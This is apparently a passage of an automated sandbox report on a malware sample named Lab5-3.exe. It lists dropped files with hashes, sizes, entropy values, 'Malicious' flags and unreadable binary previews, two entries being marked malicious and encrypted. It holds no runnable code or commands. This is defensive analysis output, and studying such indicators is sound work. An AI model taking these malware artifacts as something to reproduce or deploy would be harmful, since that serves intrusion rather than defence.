                                                                                                          SSDEEP:48:uZTWn+szncKNGV+nADMD1tXnq1IeoXkaSgh+i3opLPHfUTid3hBaUoSGFcmeykEO:uZA++cKNGVAADMdqIrBSghYwGx0uKeYO
                                                                                                          MD5:69786C875E3B285641D9CCF403E24570
                                                                                                          SHA1:825274D7DAE2610A93970BB9943637DCB0007441
                                                                                                          SHA-256:E4111CF9C6596CF185AF8297F48A92ACBC0226C677E093C43FD59021B1B32255
                                                                                                          SHA-512:8D9AC102D0344BC26E7082C09333CB8424E26C3B0AB2CE2ED407004B21C46ABCF89C0BD1EFD6DB4352647FCF9021D150536EB13E0332DF26926A302E48B9EEDD
                                                                                                          Malicious:false
                                                                                                          Preview:......4;g...A".9.3.u......,...}..O.....d7.....FM...Z....$N.Y~W.~.......:........&.Qw...C.._...:p.....O6..3..g..Z.......WK.......@.ht..!.*.Z.l<[.a...5...L*.0"...8...%.,...T...g.}(..=..........R.k_ T.<....Q~..._......B..y./...[......9.;..a..j$..w.CL.3%w..t[.L@tm6Q.V.X...&..}.pH..S.C+.....%...s.H.6..s..q.-..1...$dOKl..g .#.E....B.<8...36;.VS...` ..g..O-.C..$.<......}...7l.r.o.{Ue..D....T......u........Ab.0Q.lj..D!...!..k.l.1aK......J....t..<.7.....X6..Hh.:.e.(A........./r....&M\79.N0..p..6..?.|..E8.>.&..Y{....h....`.......y...D..Ta.....O...4aPy..`.......Y>..P.C....<X.:d,....[.b.g..lf..f.6E,.._.....g.v..A...IBEBTZ.3.....&..y.M7.W.va.......w.....lnNM.......=.:...(....vA.&p .1G..4..?.{c49......$.0A...c..uK....@....Q...g<5U..9/.c..v...~.n[.i.3..RV.}r.k.Q^..a.p.....G..}Y..Q.DZ..o..Y....S...CVo....av-X...C.....$.p.wi...&.t<.9.Y.h..........}.g.Q.........BB.C..g..O.$...M.{5.Q;.n.+l.ZE..-..rq..1."..~....Vu.F...">?....p..T.".2........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.928760605819739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:W3vRoeWr9/MezZceh1BZe0eLGHfUTid3hBaUoSGFcmeykEdEElU92i:8oJZkQceh1iZtGx0uKeY2ElUJ
                                                                                                          MD5:154AA1B03EA89EA341DB24F953C26097
                                                                                                          SHA1:B1904DC434C6064CFB29D7E217B7FE029276F4E6
                                                                                                          SHA-256:372607B5F19CAB6CBC6F74A6074AAA76A3FF9B2C1FE4E8637FB082328D61C35D
                                                                                                          SHA-512:04499F78368208A3F760E718AC8DA4BBCE5687725059067751382862364557DFB6AFEF86BF5270FB6BB52187006C6E079AEBD4A493C52241DEF67D7DAD5B8571
                                                                                                          Malicious:false
                                                                                                          Preview:y........c.fhi.D.E.....m...:6.....F..^....h..U.....1.t.H.h/m......'7p|y.`.h....?<....$"{..o.rJD.N?.....t.N$..F..v.G;..>M. [.#D.s......*.,..H.....Y...c..........~.. .... .....9.dj...e.>.$g.i..C..;.T.e....(.]k`..f..>..uX....l..].,..}.H6t..\|..........si.eP.....m..z.M....q.U.=J.-|`D.i...ls..F..."R._..r..}(...-.3B7.....Q...7@.-).E.._.z..v.....B..b..5..n..A2.y.....q....'N....QWhKJ.rS..Bq.M...+.5E.7m...oD+.J.=$L...#@:..b..6.,.-k..46.b...a.e....i].......UE..>..M.i.....2.9-..S..`.....k1..I...6...D.?}...R.c:~x.x.>dn}........[ .!0...`V:.&....gc.P...\..T.9...}.....7.t...t$Q)....Y#...fDY.....=...cAG$I..t).~....0G..y.3.....].T.=...v|.]meYG..t..J+[&.4...r.u0U.y....#....B'..Q-.h)I...V....7a..t...H"..T..w.?...0..$..Eo...........O-'.c.\.8.b@...7..!..Xq._.5vf."U:.X.[L..".....^......D.c.a8.&]O.*".m..D....|....;.U+.L..a.C..(.L....M{.B.F%.....z-.H.w.N..U.1|....L.B5P.kL. .T../...C./....i....Q...9N....x~..b"........k.;"*m|....[`NF....S.YZ.<..D..hq.gC.Od..8.{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.92893547658289
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GXBFNtaJu1vqd9BPpTTKHqNMHfUTid3hBaUoSGFcmeykEdEElU92i:GRFaJu1CdNNLGx0uKeY2ElUJ
                                                                                                          MD5:DF41FBFD4DA8C5AB4BBB3FB43DDE630F
                                                                                                          SHA1:E8DB35F50164AFDBA9EFC127AC26571B012A9356
                                                                                                          SHA-256:2C981EA508EE20E2C3433F0DF98AAB86EC8C3EBACFA87713E0BC2F4AB3C5750C
                                                                                                          SHA-512:A154DCCA9A5C60F547079552D56C3069FE3A97A7D9BDD977CB9CF3E43C225EAB103511ABCE19AC337670223CD513CB5B2777F24220AB905823F50E80D3229FB2
                                                                                                          Malicious:false
                                                                                                          Preview:....c.fD......#.".T:.XWH.....Q5Y.0.X.yH.y.......:8O.f....f....Pz>.......+y....I.m1I..y....W,....<P..n.x.7........1."..U.L...q)?n.........(./$..*n&>0..E)x.y(i.vd.F.l.1.B...IH.....@.{,MM...V.,`..Z-mW...2..}-.g..u6.k.........Fx.wA.`[...#/9<..H).h..k_R.....>..E.6...d..f.tOe&N..l...c..s...r....V&k..w.......X\1..m\.6.........a.i.Y)lt.O8h...Q..d...~..|K$..B..$........3m...'...[..."..<.K.v.;..Tp.X.:.s.\.E.Qy?.......b.... ..`)...ibs.....D].@.c.U<.(.Q..j..;.LP.."..N.oc..Re.xd.)K.O...0......$.....v.....n.z.uv..#c`.,.......Wa.?C+w.Q..A..-P...:=s-.8*&...D....c.f...`.b.t:...&.....G0`.78..?.4.?.Z/}.VU.....L..p.h....h .\...Pxs.E".lF..>...f..0..$.p..E...5]f((.0.\...........D..^....e.e..H....J.rC....:...%Hse29..g..y%...#L ...s?)...a.<..8.g...../..o.H`1...m\...%P..*...QbA..=r.3L.......}...I.X.$...O....&.y.{?Z.%"5K.^._....N.4.%-.I,_c.[.....l>.. ...H....US.....(.qHr...e*c....P.B. ..-}+..@..V.m.....&3.d....e..5.....#...I...u..!.:}.......^..H5A..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.925050656090292
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z9wOsI3n+ujK5nQtmYwjgurUlKtiFpXkmAtXgqkDnoHfUTid3hBaUoSGFcmeykEO:z9wJ0JSGQ4stin0zCRPGx0uKeY2ElUJ
                                                                                                          MD5:BA391DFC3BD52C270D9775F33363CFC3
                                                                                                          SHA1:3FF16FA5914DDC3A2215812DD51C008CD5248C64
                                                                                                          SHA-256:E702AC55EECB740E85D63CA8982C8A75CB8160C597005CEF79630E5923118EFF
                                                                                                          SHA-512:243EA565E45C7347B2716414022EC376EAC6B9DEA71128148A556E6751935CA1BC83F7991FB071AC70CC1A420634183C45EA689895DEB6BD5B5353E93AD5DA96
                                                                                                          Malicious:false
                                                                                                          Preview:X....n....K..M,.ON.8:m....O34.%.$>..r.9Q-X..Yi5.mo..4<.......>..;.].".0/.Z_v.8kHS...d.G......V....p."<1}...=7.Pc.,u....P._..SH....VD.Xf.......~ai%../...6.6..k.N.!........8..q..t..].R..*A..M.t.!.'.!.X..I..y..$...)...J0.g.....L_'{..gg #..z...b....G.O......PD^....Up.m..t<...Y..@.sn.[...`.+.F.3X......J_...0}.RF.....D...-J...b.Ha..$.....'z..M..*.....fS^^.....Y...q.O.7UA&.x.......-.`.IYa5 7.....:.*../.../N.do....T..]A.O...i.Zz...{...ln3t.Y6..$C&........j.!!f....Q.m....].z..../-I.V.{r..0..(...g......dM.Q..5rf.v..N.....!.d.8.....P....F~[V_k..:!..n.....w.7..U...t.....BXg.-."...@o.]X.I...Yx..8.3./..2.t.-i.......j..l.6....H.T!..C<Z.*tH.`...v...S..U.@.C7.%..]QD..n.G"..UZ.Xx.......?.G..ni..........W.......:..O..o.u{.E..OS~...A....=...:.-.1.|...."...g4.. ...g.;Oe....F.P.t.w4l..K*.#Ec.~cW..;......&)..d.H...;..T|M..t...X./...a.s........>V.2.c....b.d{S.0..1......Oe.b....3...5...~..b.....=.........4.!..|3Mi..Sj.<..%.....\.......T.!f.<.#..0.l.h.K.g.^....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3872
                                                                                                          Entropy (8bit):7.948113721661265
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:eqda8z98QkgiMFD/lnVS1CJmOXISCGx0uKeY2ElUJ:vda8z9hk8VSSmK0Cb
                                                                                                          MD5:DAA44548FB35706BBF8D61022BF0D811
                                                                                                          SHA1:5BDC91F202CCFA581D9A2AEC60144D0BB56DEF75
                                                                                                          SHA-256:965782BA5ED1668C4F91DC9A1288389C01951C4C422CEC1047873330B31BEED8
                                                                                                          SHA-512:48906161F8AAC8FB246E4AA37DB0ECB20759D8B7D6695443FED096CF79CD36ADD8E20383BFAD5FB2540676BFEF1E4FAA074CBD662722746EC537CF0885022EE2
                                                                                                          Malicious:false
                                                                                                          Preview:$.....m|v..z...f....Q.`...S....o.\.w..).4`G.(',..X..g.:.l...ie...F..^&%..T..4.5.E.|...S...]..a]Y.R..=...u..Bp....!.'H#...".... .7#..P..r..7uEW.\q....v.........0....D....oV.Jd.I+.8..O.....-.\.y.|../...$....j./>D.+.n.|............c....F._..d..8.=^...(.F6.Gh.q.D.A+lt.r.........\I.6HE..$lo.g...#.....u...).+9g4..dO..&.H.@|.dnG s.<X..RF.....&.K..m..K..1.K..;.y.._._..E.[../H%.]n..i$...@..}....y...E....N?L.Dz..Cv....D._...E.'96L.......CTI..(.|.R.^..t<-.......J....f..?.|.a..lwA`....g.F.......kr.p.`.........8......G(...A..@.A....r.......d.*...#..I.......Il.....|...q..2>.G...#..eN.;.k/P-z.7..Z..P.4l..1..4#..&q.8..*8.s.o?.......Fm..0......W_G..+pZ..6..^.g.FR...t.....9vK#..\.%....x.35..v....Xy....C.E]#)2.....|h[.=..............R6..6v......8{W....A..".a;..B;..uA=...9<`.4...C% {..d.3.&..*]..&V$....WP..7[#....2q..^+.r..........J..*l.|/.af.uf..5.......n..4.O.........-p...X.L....K..!...[...h... B......H...~N..>..4...&i<..w...C....I+....Be.GA%..1....lTq\...2.Y....../.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.9244657326869845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bWmD5+0dAhpzO1N4HmW/3P8kjOzuHfUTid3hBaUoSGFcmeykEdEElU92i:CD0dAzzOsGy8LzBGx0uKeY2ElUJ
                                                                                                          MD5:ACD88B746888F56F2568F9108E78A46D
                                                                                                          SHA1:C8CB5EA055F854FA2311DDF81A505F4D9BC9F5EA
                                                                                                          SHA-256:F698A5FD399CD899E76D2A7AD54F40E7B3821C9A35B14B36FDD96EF62C9D9F28
                                                                                                          SHA-512:6ADDBCF72F1275E8E8639B8BF431FEF7C0569891735DB17AC5F3DAE31BA74D46C4B9E002F0A05CBF4FA3EEAFE56358C6544661AA61261D3D734DFAA0F013BF7A
                                                                                                          Malicious:false
                                                                                                          Preview:.+..k2C..k..L.........|.,..g.I]..^.."g.pA2.>....w.....5.....MO$.u.ib|.......IF.....y..p,.(.J.X...*...@.i*......Cm!..L.. .G8....U.....a..$qs.?..[.W.....2*..\.i.......%...L.|K...jI,....:.R.:......P...G.B........oO....~y..q\....T_].../..4.m..B.zF...4...+...;..S...gA.}...8..zv9..+7..Q........_..X.n.lE.-...K.t6}[....[.r...:X.......h[1..\....9....E......I.yE.....G0..m.P......|.@.....7. 5@r=..G......Z..$<...FP..c...[_.3...U'6..$..5.5.!..A5...t...g..x..~q.8....j.p.....Uk.Z......i...jxz...2....BZ.G..CIAFM{.e.mK.....J6AC..G..V;....m..x.r.=.'7\.:.......g..R.v#Q.Q.+7x.`..Y.......Z.H...u.S.Nm0[....(.q\..Z....s.Y=b.n..d).Q....b.=.j..j. ~...S.w.8H..-.c0..I.,.C..o!.fm.c.P...'.#.J)....Rk0.fu..'yu.x\.d.3Q. .L..'.}....}..I...Oq....7..L.......ge...$.....J..x$D.......a.....y....O.yL._$J#.@mU......|.GPjQt.#...(.....)...d..s.sA..E.({..L(.....'x.U...a..!..x..>...O.e..X...._.....e,....&...\...R..Zmb2m...N...mR...z4..[.b..eV.X..0/ R.(C.DZ..T.1.k(@h....Cb...#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3680
                                                                                                          Entropy (8bit):7.9414592978521235
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:k4NVjHEL4lgx7hREf+5YIGheCFzD4Gx0uKeY2ElUJ:keHELFkf+B2jF370Cb
                                                                                                          MD5:952F97F1EE4614DF39CA079900301A8E
                                                                                                          SHA1:FC80454709E323A5F5C4995DD6904BED53379CB3
                                                                                                          SHA-256:57AB8278DA186076A4480EE009C9A7AD487ABFF4ADB5B02C334DF9A0D3BEC6F0
                                                                                                          SHA-512:794D1017AA0C25ABF5E18D83B076F79045461D4A3ED4CAB78E1BDB0AAAA756389710DF0E26487BBF03AF46237C3C2C129E4379972FE305F7444CCCDE7A3F7DB7
                                                                                                          Malicious:false
                                                                                                          Preview:...4..!.Eq......,8...p..(u.e.#.]I.3...J.u.P.+.......q.#....D-*.4vW.....V.q...^..y|I.yS.(..^......D.'.*......7.FL..z.U..!....O ...^.~.o-q....U.....l......s.........'.......E.0...NO...I.B...{.3......./..:f.r./ov...?..".c.}A3..L`~Q...E.go.W.(...c>..?.[\..EG*.....[...#.+?.(..K'/'.......?...`..*.*.{.r.R.g..J...Q.g......Z.U.w'.'.w.V..C.....W&&...1....hh.k.8:..ywU.....1.3.SQ.D... ...h:-..`J..Gdiw.1..k_..f4...n21...X.........g.1.2.J+_.vL....U....|...w.d......"..X...R......w..mj.5.+.:..me.".*...=Pi`n.o...R!.R..7|...7[.D...k.2:}.;WT9...zLU....-b..;.....W..[..P.U.(!b.y.5....l.Z2...s.e..B.7!.V...E...,e....u6.4...T.1..Q..*!..{..lAB.0x.........{.G.G.<g#%.0K}..w[)..H.;..........r....`'.c...@.2 .W..>.iO#U}...a...I!.(O.*?.F.k...t....y........o.h5.........f...,...s.~.......2.U.}.....k......D.....2.W.V.42.i2.D3...h.".........g..[.{..n.]..J._.7]Jl ..G>.Hi.M=.Z.\.1..)A.#O..*.8...WY..b..|.);T.T#.....[.nA.:tI..f..,..I.S....4.j.......t....T....'.I....'...CG..EF....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14240
                                                                                                          Entropy (8bit):7.986943194961366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:tM7BUCgJjHR865keDDZ1WLO5A80p+RNXtb:tM70jS65lPZ1WLIN00RxZ
                                                                                                          MD5:AB77E870BC09267ADBD7F033CF7FA7EF
                                                                                                          SHA1:7EEDEE280A5F6DF32456D47B24DA9FAF4A43DC53
                                                                                                          SHA-256:6AF03D7715C00985C6216AA93964377CECE1EFA25035C039D74DFAFE3D65CE93
                                                                                                          SHA-512:32DEF9DF21BEC0877B3A12D395EE10ABDAC9BA1D203329244AA0DC295F012D128B702D64A9F03D1EE88B513154B4EE45E90F1490537EF32DFD3C5773C9E5A8F1
                                                                                                          Malicious:false
                                                                                                          Preview:.+.qR.6`9*.j.u>....#..G.|.=..;.fE....h.SRX?.?..i..}..C....{.}.l.o..I...ki.m.O..\aQ..4...T.D.U.2. =.h.....:o..q..7.35.j...Xp..%WQe..g8!.....B.+..m.O.wacM..(....P.%@w.o.....C.....[8....+. .c.L.`../.~*..N.....h......0.....^.......V_.ZM6A....\...I..:.3H.P.2=...$.@W...........{....=..o\&...^.........g.b).vy.;K...Q..h....N..h.A.?.VO.T_.o...D^.}...7(.......\.d.i.y.%;.L0.u..Wn..0!....]..]g.{......r.......,k].i.D......N86y.4..>....O.L...:.......b...yRW..5..&Sd|........0x.Wc.&.o.#.......v&0lK......Um~......0..#8...........hA....|l...}. 8.?.1...{ .$..^1.b;.p....a......H.5.g..A.cp.F..._f[]T...U..j..N?.....>.Y..._.Lc.0@TF=...P.yHVo5..G.$J.:i....ir.L.....x<x=..O.a...... ....v.P...v....V\..#|.\.....B.c.=..y...8.....0.....%.;......<.=l.,..V.J6,.Wc.r@..wP+..C...&.R.Uo_...{$...y.A...^S...U...C...........*..$.m.6d..G{V%P..~...S...H@.....z...{5.)..9...c.../@EL.4F;..q.4.Y.>b....@#[h....(.\#/....#by....p.oc..<s..l.,\..,...!..U....v3@OdM3....N..s.......m-.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1872
                                                                                                          Entropy (8bit):7.906480174155132
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7T86OqIGIoXHfUTid3hBaUoSGFcmeykEdEElU92i:74sIGIo8Gx0uKeY2ElUJ
                                                                                                          MD5:B55FED176133226527E177EA8CD94EBA
                                                                                                          SHA1:C9805B972F5B84097ACE456B54DB336C48816C32
                                                                                                          SHA-256:7B367AD320C2504140A954B8824F108159062B3E6B61073896D75332E0B6D09B
                                                                                                          SHA-512:899DAEB89DCC308E92FF88F240AD43D872DC981AEC1F606F4542221FABDC0CD845931061404E48D931317BCFF8656992E8D393E6F215087D4EC4646DBEB49AE4
                                                                                                          Malicious:false
                                                                                                          Preview:W...4O.~......8..I.T0.[..bQhT"d..)e.9..';...Rn.ok....;gy.\....;....$q...<.7...S...Z.mj..@..|..5......<....y..O9w;.DP......+C#.j..K.....$U..^..3..._..'M..8.L.$0q..A..]...B.R."....I.lBy..........C.T......s5.T../[a..GHx.K..,............s....0....`Bq1&..(~....T....Z.S?.GJ......n..S..[.}.}...b.8......k.....39..[....m7^w.*.hW....Fb.[....c... .M. .3.....T.V.,.z.8.|C., ..f...s....b...+U.+Y.Lao.....).2...-}Z..C.h.f....<.....0D..GIn..h.'-X.g8...n..........97ch\1..X).S.X.=..+.zLq7i...z$...Q?.}T......*..Y.).........#...H..*-z}.o..v<.M.g...n.&...B....`;BE.)O...Zi..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4304
                                                                                                          Entropy (8bit):7.961817368468133
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dFhCcR/N5BUrcsVKnAuGtIUK+TXheokZR2Gx0uKeY2ElUJ:dFws/NfucsVKnafXFwV0Cb
                                                                                                          MD5:FEC4F6E60ECF600EB8C5F1A7C4535AF4
                                                                                                          SHA1:8BFD7348EF338C640EA8BAE8A43B046662543F92
                                                                                                          SHA-256:04CBA97F2688A06C28F3D882028AD784969575B1CE946D3180567C6CBFC56F0B
                                                                                                          SHA-512:F667FF8BBF57D34C53D2A8C62BE3EC2AD16B157A80E9797B7453C6EB8990ECD0F1C0952B6D2CD75F17027F3A19CA5BD8AC6C0D2385A334364E84DABDC588A697
                                                                                                          Malicious:false
                                                                                                          Preview:s=tz.=.e.......".}.N.Z_....g...x.?...W.=.A.1x.5....O....H..4L.K.......].]..rY.9...-.g..`......[d.")^..J....;... ..-.U/....i.x.J..M...+9[...e.s..._./.z..'...`'!F>..n"..F./.=....._.{....A.HXY..{cTf.k.h..:..B.V.\<.M..Ea..F.I ..GM.q........L..-.".?..).@...%x.A..N....8.........|.e.[\....m.cX.x.PQ(u.(..O.~.*..T...........{....8.k....8nh.1....9uYbJE.{..\.O...B...}11N;r.T.....R...J..%.......yUbBhi.. ....P.F.$..ce.e..;.fUs.........._.?.Q.WN.27.=...\.8......l....\...!.".t."..u.EI.?{m.E.......z..kw...-Q..?.I%.F+....*z.....x..k.o....I....F.K.<... \.~7..{km .9......_`..>]..9.+.M.e-a.e...<N..?.o.b..Pq..w..F@..q ..1R'>lv..}...8...@...3....eFl..d......2...@.BZ&.k..6...s....uN.......).............)$...=.#{.{I....U=..l+h......4-.......U...W.-.]...,..k_..}....dd...4y..J#.}.....5..fM.<#....;.(/Y..6........9..4].B.Z..$..UC....0P.D.x.4.z.@...<....Q..XE ...w1.M.Y..k.\...dy:.r.K^T...i2R...`..*(9psv.V..36 .lq.~].c..--..a.D.4..E.>...).5...v.v..~.8.......X.OS..|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.936617786863093
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Paj8JCHfd7+7c0yjFukAqQh0BKfjLz3dkHfUTid3hBaUoSGFcmeykEdEElU92i:+b/l+Y0BL5lGx0uKeY2ElUJ
                                                                                                          MD5:C1853A80F9AE2D47060C5144E32639B8
                                                                                                          SHA1:738D8FE5F857501395E73CCCE7B22579355ED4F9
                                                                                                          SHA-256:08A01E77B7504D2D16B8745F0CC6709D643A318AAEC3BEDD6E4C884032C79F39
                                                                                                          SHA-512:ECAF484E3605F95C40B5C647D144DB1AB4A754CF46A0D9A5636352CB60BDB6A006F236D6D9249B04832D7649BE9AA118F9898516B078C18BA90909CAFD806851
                                                                                                          Malicious:false
                                                                                                          Preview:.../..n2...w+..A.*..Jet.8.n.....r(B.HoM....).5..Pf...Pvu..m.k.v..d...m.S/....x......jgzI..4...WW.F.u.x...".L..V..oC.];3.Z.(Zf...k....S....a.z..'..T....!........Hj...{..,h&.g....D.7..jQ..~.y......i....-Q.g.v.A.T.Fv..<...p>+Z%..,o...Y....H...QM..Zj@..a.=...~.,...c.i....;...3.K.......a...Jm..>.[mn],..]..F.....n.#)....,..!...e.>.+4.C..3U._.c.,......?.T.b...-.\....hL...N....b..s...j....q....w.............z.Y.!..v.d.2......f;..^... . ..E.....ya...T.....I}^...]...Q>O.].E.T.M[m.,.?.Xy1<..#z'78.|Ik-.'U.......T ..=B.E...Z..z..``wh.:..P....:.......,..AI.....`Dq.........h..qP9"....,.q.>)-K.p."....\.S.@..3..M...QX,)m.e..aV....Hm....S2.\*[......0!...K2p;..Q....J"X...r........4....>.....C`n.3..S..a... . ...*....'<...<....5..gC,Nmp.h^...gk..$..qKK..j6./...\.s.\.T..[.N..D.U...*6N..Ku.q.z%s...s..^.uQ.K<..[rd1c.n.p..O#.;.......B..K|bb..WT`.]`$.F#o.....=un...&..o.6.|t.%..*.8l........../0..At.x;.%..].'.`..U...=...SnR.8....rc.f.b..a........#..R.^.h.[.....MUGO
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31152
                                                                                                          Entropy (8bit):7.993827347344333
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5Nhl8jcnG7rJpdb98hMD1J6MEhQWKN4SV4Zr7r6/TQsmEf6Z:5znGXJjb9QMZJuTKNXV4N6/ssPCZ
                                                                                                          MD5:EB8CED0A2CB75BB8B155387C2116BE89
                                                                                                          SHA1:D031A4DE714124CC2250885627AB6885EA6D6AA5
                                                                                                          SHA-256:CDBEBDC4E8F4C51EE3BF4D506D383BAF33E2436747D5D6D08F4915FC34F3A767
                                                                                                          SHA-512:D49452C2F1D8CE7D473D3A071CA42A1EC83B44DA184B5A351DEDB6ACA175D0A4140814916FB62C4B5F61BEE1A328227E4EA945D0741D0A4A223839249144E202
                                                                                                          Malicious:true
                                                                                                          Preview:...B..*"i.r.r.]JB..&fz.M8..B....3.,....k.PnR.6...7..N..........H.2....k..>=h.F.Nh........B..*.k%-4.g..!!g..,..B.._.....F...7.4.&.>.d].@........:...Q...Mh:8...d.S..?_.....z....3......>.....{.[n..O.e.......s..w..<0.............,..>.}..!......5..1..B.f.$..`.7..7g.'`.=.....<.04.9$...~.2.0...T...F=%.p.....Ij.X..2.Y.\.H.....*.>.M..Z.b\.Y..r<@PKi.f..g=....4S.3t.9..Z.Kf.4....<.F.....".......k.3O....,.:.......u...Dfr.(./T..z.J....B.%..x.............8...F.f.....'.MR..sf.....[T.X.k,..Z.u.d.#b.}Q.dm>...U.l...U.J.|....$.0.[z.-..=..*...FW.0..j.h..#.WT.....=...^D...fC.mA...-....(.?}:.HiWL:.i..F..4W.....;[Y...>.......b.....6F.4j...[..E....Q..I...6 r..q...+..R..0:f.hpB.2d.l..-.K...D%..gc.._.{.d]..n@t..~.>..!.s..."..i/..~. /.xN.\..IE......;........8M..Q.......`.^...._...#.A$BJ..lN..U.....j.h...7..s.v.Q.....&.M.x.....n.sEm...n.h.-..#...OS.i...:...$......[w7.mT. ..d[tQ........d..L ]..y....)uW....e.......k..[...Qj\6....SP+...9%1W...Ze......;w4.jN.b.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68288
                                                                                                          Entropy (8bit):7.99704428973954
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:Pj68+54DYl80gn+jBMNWHFtEhIs9ATxm0VVes8nvUZ:Lp++clDgn+jBMNWHGpGdms8s5Z
                                                                                                          MD5:A894FBB6B22851FE506339F4AB199747
                                                                                                          SHA1:B5C15F6A4D03E4FE28162AE8425B6527D9321E24
                                                                                                          SHA-256:8447944044BF87163A2984E1D58D083F3F00297717FDC9B69A58844F3DC9CAB5
                                                                                                          SHA-512:09FEF1D71EFBEBE4E8A9FCB40B826338F2CD00ADF516D1BA031049BEA60E4BE238470D7E2F5ADF56B809172E65A6C00284F220B22396DEBD8F2E36294E282D67
                                                                                                          Malicious:true
                                                                                                          Preview:...S...e..%..a....%D...BB:3.b$8...U.....2....!.1.....vEN...N.......y..=..d..Fd}.........u2T.e#\k.o.8'...K.cG.G&...=.o...R.W\(+P....Wn....G.;M%..$W .{.9C...5..U.L....l....e..A.J.%..'.y..-.z(.Zk..^.K..%`...=.../...1SC.f .r.].S...z./..M.:..^...RQ.Bx..l.........Sw...P..B....~kQ...ys.....2x..i...qQ.eYbsaG_|.0.r...3|..G..B.I...y....x..9...T..dUC...j@.D.T..h~.=.......W..w.....QXw....a3..E5....z&......Qn.....!..7....v..<.....#{....g.x........].b..6...L.|......."Z...[...n...CN1.....C./.J.b#......Jf...2...>~(.t9..v.&.V.q.]!G.....?..g....e..u..l..X}.-T.v.".y........8HI..6.....K:. .&;[.;........k.#e....-..^.....#...OV.k3.&..bM.F#uA.3......p,..*>];...I.P..t.."@:.uJ..y.....e.zgs..+......\..6L.>ua......}..>G.6.B}=.....j...R.i.9...f..... ....v..^.X.=.o.f...P....T..)..."......J..._.r.........W...H3.+...X`..y...O..?.74..C....P..8..c.]<*.+...$L. ....S.o..U...L?tR...P..#.+}...l. n.L*..'.#.1M)F....4n./+...h.]....y.w..n.J.....\O-(F.....Bm9S...&.g...`...'m...o>d..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10096
                                                                                                          Entropy (8bit):7.981377533264176
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:MuWGCZ32QPmen12H1ZHPs2+X5xm3NAZ2ZPybdUzhW3Y3a78pP3A0Cb:MNG03Lee1q1ZvTakOCEIWoI8pPAtb
                                                                                                          MD5:532CCEBEF081E456289A7033519B09DA
                                                                                                          SHA1:F63455BEDA55BA204DEF22C864F71A02D34530BB
                                                                                                          SHA-256:2FF77C1A443E400723E73B17809C92ED93EF633647E0B8161465C7F115A78247
                                                                                                          SHA-512:7ED3940F213CA5B326D17D75B14281146E90A5AB10655F388713831E65EBDCF8FBC993D3A202192F4277E00F6AA53B84825D7B6ADB2A93DC5DFEE29333B4FAED
                                                                                                          Malicious:false
